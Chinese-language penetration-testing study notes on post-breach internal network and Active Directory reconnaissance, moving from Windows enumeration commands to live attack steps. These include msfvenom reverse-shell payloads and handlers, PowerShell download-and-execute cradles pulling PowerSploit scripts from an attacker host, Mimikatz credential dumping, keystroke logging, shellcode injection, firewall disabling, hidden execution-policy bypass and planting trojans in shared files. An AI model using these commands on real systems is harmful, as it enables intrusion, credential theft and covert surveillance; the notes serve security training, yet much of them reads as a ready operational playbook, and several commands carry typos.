02.內網信息收集

內網信息收集概述
本地信息收集
域環境信息收集

服務器收集 更要全面一些
是否要提權

pc 域用戶權限:

網絡的收集
網段網絡中其餘主機和設備

PART 1: 內網信息收集概述

內網信息收集概述
當咱們滲透進內網環境後，對網絡拓撲一無所知，測試人員應先對當前網絡環境作出判斷。對當前機器角色分析，對機器所處網絡環境拓撲結構分析，對機器所處區域分析。
當前機器角色分析：
判斷當前主機是web服務器/開發測試服務器/公共服務器/文件服務器/代理服務器/dns服務器/仍是存儲服務器等。具體判斷過程可根據主機名，文件，網絡連接狀況綜合完成。
對機器所出網絡環境分析：
是指對所處內網進行全面數據收集和分析整理，繪製出大體的內網總體結構拓撲。
對機器所處區域分析：
判斷機器所處於網絡拓撲哪一個區域，是在dmz/辦公區/仍是核心區/區域並非絕對的，因此區域界限也是相對的。

經過web進入:
若是經過web進去的服務器裏面還有,文件服務器:全部人都得訪問這個文件服務器.
替換掉文件植入馬,許多人就會去下載拿到控制權

若是裏面有DNS:
經過DNS能夠看到解析有沒有內網的服務器,例如客服管理平臺等之類的,域環境也能看到.

若是搭建了DHCP服務器能夠去查看他有哪些網段:
若是有能夠肯定他的內網都是經過這臺DHCP服務器來分發的,會有多組網段'

開發測試服務器:
能夠得到測試和開發的產品

代理服務器:
能夠獲取內網我的pc的帳號並以登陸

PART 2: 本地信息收集

本機的信息收集
本機信息收集包括操做系統、權限、內網IP地址段、殺毒軟件、端口、服務、補丁更新頻率、網絡鏈接、共享、會話等。若是是域內主機，那麼操做系統、應用軟件、補丁、服務、殺毒軟件通常都是批量安裝的。
手動信息收集
查詢網絡配置信息

inconfig /all
查詢操做系統及軟件信息

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 查詢操做系統和版本信息 英文系統
systeminfo | findstr /B /C:"OS 名稱" /C:"OS 版本" 查詢操做系統和版本信息 中文系統
echo %PROCESSOR_ARCHITECTURE% 查看系統體系結構
wmic prouct get name, version 查看安裝的軟件的版本、路徑等
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name, version" PowerShell收集軟件的版本信息

權限不一樣收集的不一樣:
普通用戶沒法獲取密碼信息/sam沒有權限
客服電腦通常是管理員得提到system權限 用Uac提權

內網IP地址段:
服務器:
ipconfig /all:通常會有多個網卡,有多個網卡就有多個網段
如何查找內網網段:
1.用工具掃網段(192.168.0.10/192.168.1.10/192.168.3.10)
s.exe 基於TCP和SYN掃描 192.168.0.0 192.1168.255.255 445
若是192.168.10.100 445端口開放, 就證實10網段有主機在使用

2.文件共享連接記錄(ftp連接記錄)瀏覽器訪問記錄,mstsc3389鏈接記錄
若是某臺內網機器提供文件共享下載,那麼垮網段也能訪問
測試方法win+r輸入\\1 會有歷史記錄
測試方法個人電腦ftp 會有歷史記錄
遠程桌面鏈接 會有歷史記錄
網頁就打開瀏覽器訪問歷史記錄

3.抓包分析網絡流量 混雜模式 wireshark-win32_cn
用msf 經過meterpreter來創建回彈鏈接抓取流量,要作轉發

4.黑掉路由器,核心交換機

當有了其餘的網段就能夠縱向滲透不然一直都是橫向

看進程:tasklist

看端口:netstat -an
看服務:看端口就能看到服務

看補丁:systeminfo

看網絡鏈接:netstat -ano

看共享:net share

查看計劃任務:黑客會定時建立管理員用戶名或者執行程序

查詢用戶列表
net user 查看本機用戶列表
net localgroup administrators 獲取本地管理員信息
query user || qwinsta 查看在線用戶

查詢本機共享列表
查看本機共享列表和可訪問的域共享列表
wmic share get name,path,status 查找共享列表
查看後對相應的文件捆綁paylod作會話鏈接
也能夠映射遠程主機的盤由於默認c,d,e都是默認共享
映射方法:net use k: \\192.168.156.15\c$ 登陸帳號密碼就行 條件開445

查詢路由表以及全部可用接口的ARP緩存表:
route print
arp -a 內網的通訊這裏都有記錄.這個很重要,內網要通訊必定要發一個arp廣播
路由默認0 走的接口網關,去往任何目的 都交給接口網關
如何看是否被欺騙,看arp緩存表若是出現重複就是被欺騙
防護方法:綁定mac地址,或者開防火牆,服務器會綁定通常
題外話,kali能夠強制把https的包變成http

netsh命令能夠作端口轉發:
某服務器用公網ip,也能夠訪問內網.單服務器卻在內網,簡稱站庫分離,
用netsh把公網的3306端口轉到內網的3306這樣就能夠轉發了
百度搜索 netsh 端口轉發

-----------------------------------------------
wmic service list brief 查詢本機服務信息
查詢進程列表
tasklist 查看當前進程列表和進程用戶
wmic process list brief 查詢進程信息
查看啓動程序信息
wmic startup get command, caption
查看計劃任務
schtasks /query /fo LIST /v
查看主機開機時間
net statistics workstation
查詢用戶列表
net user 查看本機用戶列表
net localgroup administrators 獲取本地管理員信息
query user || qwinsta 查看在線用戶
列出或斷開本地計算機與所鏈接的客戶端的對話
net session
查詢端口列表
netstat -ano
查看補丁列表
systeminfo 查看系統詳情
wmic qfe get Caption,Description,HotFixID,InstalledOn 查看補丁的名稱、描述、ID、安裝時間等
查詢本機共享列表
查看本機共享列表和可訪問的域共享列表
wmic share get name,path,status 查找共享列表
查詢路由表以及全部可用接口的ARP緩存表
route print
arp -a
查詢防火牆相關配置
netsh firewall set opmode disable 關閉防火牆(Windows Server 2003 之前的版本)
netsh advfirewall set allprofiles state off 關閉防火牆(Windows Server 2003 之後的版本)
netsh firewall show config 查看防火牆配置
自動信息收集
爲了簡化手動信息收集的繁瑣步驟，咱們可用使用自動化腳本 —— WMIC(Windows Management InstrumentationCommand Line,Windows管理工具命令行)腳本，腳本下載地址，執行該腳本之後，會將信息收集的結果寫入HTML文檔。
http://www.fuzzysecurity.com/scripts/files/wmic_info.rar

PART 3: 域環境信息收集

查看當前全權限
whoami 查看當前權限
whoami /all 獲取SID
net user xxx /domain 查詢指定用戶的詳情信息
判斷是否存在域
ipcondig /all 可查看網關IP地址、DNS的IP地址、域名、本機是否和DNS服務器處在同一網段等... 而後，經過反向解析查詢命令nslookup來解析域名的IP地址，用解析到的IP地址進行對比，判斷域控服務器和DNS服務器是否在同一臺機器上。
systeminfo 對比查看"域(域名)"和"登陸服務器(域控制器)"的信息是否互相匹配。
net config workstation 對比查看"工做站域DNS名稱(域名)"和"登陸域()域控制器"的信息是否相匹配。
net time /domain 判斷主域。

實戰
能夠登陸3389選項裏有驅動器勾選上就能夠拖物理機的資源,弊端就是本身的盤符也會進入目標機,管理員可能會映射
命令行收集很麻煩並且容易發現,就是msf收集
製做馬
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.182.138 lport=1121 -f exe > xy.exe

開偵聽
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.182.138
set lport 1121
run

把馬放進03服務器
等待回鏈

hashdump收集hsx
進入shell
看進程,等等均可以
background掛起
----------------------------------------------

域收集
把馬放進win7點擊回鏈

對話生成後: //生成對話後可使用 run winenum 收集命令的信息
進入shell
whoami
查看帳號 fanghan域裏fh1帳號
----------------------------------------

whoami /all
看權限以及域用戶的SID //之後用來作黃金票據和白銀票據
:S-1-5-21-2511895695-3322341454-56546430-1103
S-1-5-21-2511895695-3322341454-56546430只要1103這一部分
---------------------------------------------------------

net user xxx /domain 查詢指定用戶的詳情信息
net user fh1 /domain 看獲得什麼時間建立的以及
----------------------------------------------------------

net user domain 查詢域用戶
這條命令是直接上傳到域控的
---------------------------------------------------------

net time /domain 判斷主域。
能夠看見主域控的地址
\\WIN-9JJK4CNGD41.fanghan.com �ĵ�ǰʱ���� 2020/11/18 2:14:59
嘗試訪問
dir \\WIN-9JJK4CNGD41.fanghan.com\c$ 訪問失敗沒有權限
能夠用漏洞提權或者身份訪問或者白銀黃金票據訪問

--------------------------------
探測域內存活主機
使用nbtscan掃描本地或遠程TCP/IP網絡上開放的NetBIOS名稱服務器，使用方法：nbt.exe 192.168.1.1/20, 輸出的結果第一列爲IP地址，第二列爲機器名和所在域的名稱，第三列即最後一列爲及其所開啓的服務的列表。
使用ICMP協議快速探測內網
arp-scan工具 使用方法：arp.exe -t 192.168.1.1/20 //後面講
Empire的arpscan模塊 //後面講
Nishang中的Invoke-ARPScan.ps1腳本 //後面講

--------------------
域內端口掃描
注意端口banner信息
探測端口開放的服務
注意探測端口觸發防護系統
域內存活主機探測
利用netbios探測內網
使用工具：nbtscan
使用方法：
nbtscan.exe 192.168.0.1-254
工具地址在:內網安全---NBTSCAN
上傳到目標主機.cmd進入目錄
nbtscan.exe 運行就看到用法了
例如:
192.168.8.0/24
能快快速掃描網絡其餘主機以及主機名和mac地址用於橫向縱向
----------------------------

工具2 s.exe
工具地址在:密碼破解---3389---s.exe
192.168.8.1 192.168.8.254 445 512 //512是線程
-----------------

收集域內基礎信息
net view /domain 查詢域
net view /domain:HACHE 查詢域內的全部計算機
net group /domain 查詢域內的全部計算機
net group "domain computers" /domain 查詢全部域成員計算機列表
net group "domain admins" /domain 查看域管理員
net accounts /domain 獲取域密碼信息
nltest /domain_trusts 獲取域信任信息

域組分析
*DnsUpdateProxy
*Domain Admins //2通常這個域管理員算是大的了
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins //1限最大,域林管理員組
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Read-only Domain Controllers
*Schema Admins
--------------------------------------------------

nltest /domain_trusts 獲取域信任信息
能夠看到本機和哪些域作了信任關係,跨域會用到 用祕鑰僞造能夠攻擊
-----------------------------------------------------

查找域控制器
nltest /DCLIST:hacke 查看域控制器的機器名
Nslookup -type=SRV_ldap._tcp 查看域控制器的主機名
net time /domain 查看當前時間
net group "Domain Controllers" /domain 查看域控制器組
netdom query pdc 查看域控制器的機器名
命令都差很少找一個最簡短的記下來
-------------------------------------------------------

獲取域內的用戶和管理員信息
查詢域內用戶列表
net user /domain 向域控制器進行查詢
wmic useraccount get /all 獲取域內用戶的詳細信息
dsquery user 查看存在的用戶
net localgroup administrators 查詢本地管理員用戶
查詢域管理員用戶組
net group "domain admins" /domain 查詢域管理員用戶
net group "Enterprise admins" /domain 查詢管理員用戶組
---------------------------------------------------------

定位域管理員
在域網絡攻擊測試中，獲取域內的一個支點後，須要獲取域管理員權限；定位域內管理員的常規渠道，一是日誌，二是會話。
常見域管理員定位工具：
psloggedon.exe
PVEFindADUser.exe
netview.exe
Nmap的NSE腳本
PowerView腳本
Empire的user_hunter模塊

--------------------------------------------------------

查找域管理進程
net group "Domain Admins" /domain 獲取域管理員列表
tasklist /v 列出本機的全部進程及進程用戶
net group "Domain Controllers" /domain 查詢域控制器列表
NetSess -h 收集全部活動域的會話列表
分析域內網段劃分狀況及拓撲結構
在掌握了內網的相關信息後， 滲透測試人員能夠分析目標網絡的結構和安全防護策略，獲取網絡信息、各部門的IP地址段，繪製內網的拓撲結構圖。
---------------------------------------------------------------------------

使用powershell 收集信息 //重點來了
默認powershell是不能執行腳本的
獲取腳本策略
get-executionpolicy
更改執行策略必須以管理員身份執行才能夠，不然報錯註冊表安全問題
set-executionpolicy unrestricted
繞過腳本
-exec bypass
powershell.exe -Executionpolicy BYpass -file 123.ps1 繞過安全策略直行腳本
powershell.exe -Executionpolicy BYpass -windowstyle hidden -nologo -nonlnteractive -noprofile -file 123.ps1 本地隱藏繞過權限直行腳本
cmd下使用powershell
powershell -exec bypass "import-module c:\powershell.ps1;Get-NetUser"
powersploit 信息收集
PS C:\> import-module .\powerview.ps1
PS C:\> Get-NetDomain 獲取當前的域名稱
Get-Netuser 返回全部域內成員的詳細信息
Get-NetDomainController 獲取全部的域內的控制器信息
Get-NetComputer 獲取全部域內機器的名稱
Get-Netshare 獲取域內的全部的網絡共享
Get-NetRDPSESSION 獲取指定服務的遠程鏈接信息
Get-NetProcess 獲取進程的詳細信息
Get-ADOPJECT 獲取活動目錄的信息
這個命令是用戶是否登錄計算機且判斷用戶是否有管理員權限
invoke-processhunter

解析:
實戰用到內網安全工具包--PowerSploit-master
PowerSploit-master裏有不少模塊,Recon是收集信息模塊
Recon裏有的腳本
PowerView.ps1//收集域信息
powershell調用
import-module .\powerview.ps1 //導入默認不能執行
powershell -exec bypass import-module .\powerview.ps1 //導入成功
/////實戰演示失敗,,,,
---------------------------------------------------------------

invoke-portscan 用於掃描端口//記得要調用powershell
iex(new-object net.webclient).downloadstring("http://192.168.3.1/PowerSploit/Recon/Invoke-Portscan.ps1") 下載掃描腳本到服務器
invoke-portscan -hosts 192.168.3.1,192.168.3.200 -ports "21,22,80"

invoke-mimikatz 抓密碼
iex(new-object net.webclient).downloadstring("http://192.168.3.1/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -dumpcreds 導出hash

get-keystrokes 鍵盤記錄
iex(new-object net.webclient).downloadstring("http://192.168.3.1/PowerSploit/Exfiltration/Get-Keystrokes.ps1")
Get-Keystrokes -logpath C:\Users\admin\123.txt 記錄鍵盤保存到123.txt裏面

實戰:須要把整個PowerSploit-master 重命名PowerSploit而且放到vps上
http://vps地址/PowerSploit/Recon/Invoke-Portscan.ps1 上傳到vps地址並訪問成功
iex(new-object net.webclient).downloadstring("http://vps地址/PowerSploit/Recon/Invoke-Portscan.ps1") //目標機導
invoke-portscan -hosts 192.168.3.1,192.168.3.200 -ports "21,22,80" 添加端口掃描

invoke-mimikatz 抓密碼
iex(new-object net.webclient).downloadstring("http://192.168.3.1/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -dumpcreds 導出hash

get-keystrokes 鍵盤記錄
iex(new-object net.webclient).downloadstring("http://192.168.3.1/PowerSploit/Exfiltration/Get-Keystrokes.ps1")
Get-Keystrokes -logpath C:\Users\admin\123.txt 記錄鍵盤保存到123.txt裏面

-----------------
kali也有powersploit
powershell啓動
ls查看模塊
cd recon
ls poweview.ps1
在生成的會話框裏,load powershell 加載
powershell_import 粘貼poweview.ps1路徑
powershell_exeute get_NetDomain 域哪些
powershell_exeute get_NetUser 域用戶
powershell_exeute get_NetCompter
-------------------------------
工具
empire
後面講
-----------------------------------------------

如下內容粘貼複製
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.129 LPORT=1123 -f powershell -o /root/xdx.ps1

偵聽
use exploit/multi/handler
set lport 1123
run

iex(new-object net.webclient).downloadstring("http://192.168.3.1/xdx.ps1") xdx.ps1 下載生成好的ps腳本

iex(new-object net.webclient).downloadstring("http://192.168.3.1/PowerSploit/CodeExecution/Invoke-Shellcode.ps1") 下載
invoke-shellcode.ps1 能夠將msf生成是payload進程注入
Invoke-Shellcode -shellcode $buf -Force 執行進程注入，msf會偵聽回來一個回話

-------------------AntivirusBypass 發現殺軟特徵ScriptModification 在目標主機建立或者修改代碼CodeExecution 在目標主機執行代碼Persistence 後門腳本持久控制Exfiltration 在目標主機進行信息收集Recon 以目標主機爲跳板進行內網信息偵查Mayhem 藍屏等破壞性腳本Privesc 用於提權